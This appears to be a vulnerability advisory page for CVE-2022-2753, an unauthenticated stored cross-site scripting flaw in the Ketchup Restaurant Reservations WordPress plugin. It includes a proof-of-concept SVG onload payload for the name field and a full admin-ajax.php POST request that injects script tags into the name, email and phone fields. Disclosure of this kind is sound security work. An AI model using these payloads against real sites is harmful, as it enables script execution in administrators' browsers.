Lucene search
Bastijn OuwendijkWPEX-ID:3C6CC46E-E18A-4F34-AC09-F30CA74A1182HistorySep 06, 2022 - 12:00 a.m.
Ketchup Restaurant Reservations <= 1.0.0 - Unauthenticated Stored XSS
2022-09-0600:00:00
Bastijn Ouwendijk
202
restaurant reservation
unauthenticated
stored xss
vulnerable fields
client-side validation
admin-ajax.php
EPSS
0.001
Percentile
45.7%
The plugin does not sanitise and escape some of the reservation user inputs, allowing unauthenticated attackers to perform Cross-Site Scripting attacks logged in admin viewing the malicious reservation made
As unauthenticated, make a reservation (ie on a page where the [reservation_form] is embed) and put the following payload in the FullName: a a"><svg/onload=alert(/XSS/)>
The Phone Number and Email are also vulnerable (they are only validated client side):
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 428
Connection: close
action=kechup_rr_bookings_interact&validation_key=680bed9c59&operation=create&data=%5b%225%22%2c%2211%22%2c%2211%3a11%22%2c%2213%3a11%3a00%22%2c%222022-08-07%22%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20full%20name%5c%22)%3c%2fscript%3e%22%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20mail%5c%22)%3c%2fscript%3e%22%2c%222%22%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20phone%20number%5c%22)%3c%2fscript%3e%22%2c%22pending%22%5dRelated
prion
prion
Cross site scripting
2022-09-19 14:15:00
cvelist
cvelist
patchstack
patchstack
wpvulndb
wpvulndb
Ketchup Restaurant Reservations <= 1.0.0 - Unauthenticated Stored XSS
2022-09-06 00:00:00
cve
cve
CVE-2022-2753
2022-09-19 14:15:10
nvd
nvd
CVE-2022-2753
2022-09-19 14:15:10